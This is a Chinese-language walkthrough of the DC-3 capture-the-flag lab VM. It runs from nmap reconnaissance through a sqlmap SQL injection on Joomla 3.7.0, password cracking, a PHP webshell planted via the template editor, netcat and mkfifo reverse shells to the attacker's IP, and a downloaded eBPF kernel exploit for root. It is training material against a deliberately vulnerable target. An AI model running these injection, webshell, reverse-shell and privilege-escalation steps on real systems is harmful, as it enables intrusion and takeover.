靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg 提取码:0na8
首先查看本机kali的ip地址:192.168.159.145 ifconfig 利用nmap扫描靶机IP nmap -sP 192.168.159.1/24 查看靶机mac地址 打开虚拟机设置,点击网络适配器——高级 根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141
使用nmap进行完整扫描 nmap -A 192.168.159.141 -p 1-65535 发现80端口开放,尝试使用浏览器进行访问 使用指纹识别 whatweb http://192.168.159.141/ 结果显示靶机使用Apache平台,服务器为Ubuntu
使用joomscan进行扫描 joomscan --url http://192.168.159.141/ 结果显示扫描出了网站后台,使用浏览器访问
http://192.168.159.141/administrator/
网站后台为joomla 3.7.0模板 查找模板漏洞 searchsploit joomla 3.7.0 将结果拷贝至当前目录并查看 cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt cat joomalv370_sqli.txt 发现注入点 使用sqlmap列出数据库库名
sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 列出joomladb的所有表名 sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering] 发现#_users表 列出users表的字段类型 sqlmap -u “http://192.168.159.141/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering] 列出账号密码 使用john工具破解密码 vim joom.txt john joom.txt 结果显示密码为snoopy 进入后台发现 他告诉我们这次DC-3实战只有一个目标获得root权限 在这个目录下有一个beez3 的模板 进去之后我们发现有new file可以编辑文件,考虑上传木马 要上传木马,我们先要找到当前文件所在的目录 目录为http://192.168.159.141/templates/beez3/html/ 回到刚才的页面点击new file 在html下创建一个php文件 编辑文件 尝试访问这个文件,执行成功 使用蚁剑连接 右键连接打开虚拟终端 使用命令查看基本信息 反弹shell,kali本地监听 nc -lvvp 2333 蚁剑虚拟终端 nc -e /bin/bash 192.168.159.145 2333 -e参数不可用 执行命令 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.145 2333 >/tmp/f 可以知道当前靶机系统为Ubuntu 16.04 searchsploit ubuntu 16.04 复制文件 cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt 由于电脑无法访问国外网站,使用网盘下载exp EXP资源 链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g 提取码:0fkw
注意此处不要解压压缩包 开启kali的apache2服务:service apache2 start 将文件复制到网页目录下:cp -r 39772 /var/www/html 在靶机执行命令 wget http://192.168.159.145/39772.zip unzip 39772.zip cd 39772 tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit ./compile.sh
./doubleput
|